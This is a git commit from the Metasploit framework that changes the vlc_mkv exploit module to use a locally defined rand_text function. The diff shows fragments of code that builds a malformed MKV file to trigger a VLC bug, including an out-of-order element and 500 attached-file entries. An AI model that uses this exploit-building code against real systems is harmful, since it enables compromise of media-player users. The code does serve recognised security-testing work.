exploit rand_text

exploit:vlc_mkv use rand_text functions defined in exploit.rb
GSoC/Meterpreter_Web_Console
Jacob Robles 2018-10-09 20:58:22 -05:00
parent e07da5c518
commit 94f260f289
No known key found for this signature in database
GPG Key ID: 3EC9F18F2B12401C
1 changed files with 4 additions and 4 deletions

View File

@ -221,11 +221,11 @@ class MetasploitModule < Msf::Exploit::Remote
void = "\xec" << data_size(2) << "\x41" # Trigger bug with an out-of-order element
# Info
segment_uid = "\x73\xa4" << data_size(16) << Rex::Text.rand_text(16, payload_badchars)
segment_uid = "\x73\xa4" << data_size(16) << rand_text(16)
info = "\x15\x49\xa9\x66" << data_size(segment_uid.length) << segment_uid
# Chapters
chapter_segment_uid = "\x6e\x67" << data_size(16) << Rex::Text.rand_text(16, payload_badchars)
chapter_segment_uid = "\x6e\x67" << data_size(16) << rand_text(16)
chapter_atom = "\xb6" << data_size(chapter_segment_uid.length) << chapter_segment_uid
edition_entry = "\x45\xb9" << data_size(chapter_atom.length) << chapter_atom
chapters = "\x10\x43\xa7\x70" << data_size(edition_entry.length) << edition_entry
@ -244,8 +244,8 @@ class MetasploitModule < Msf::Exploit::Remote
data = build_data(size)
data = "\x46\x5c" << data_size(data.length) << data
500.times do
uid = "\x46\xae" << data_size(8) << Rex::Text.rand_text(8, payload_badchars)
file_name = "\x46\x6e" << data_size(8) << Rex::Text.rand_text(8, payload_badchars)
uid = "\x46\xae" << data_size(8) << rand_text(8)
file_name = "\x46\x6e" << data_size(8) << rand_text(8)
header = "\x61\xa7" << data_size(uid.length + file_name.length + mime.length + data.length)
attached_files << header << file_name << mime << uid << data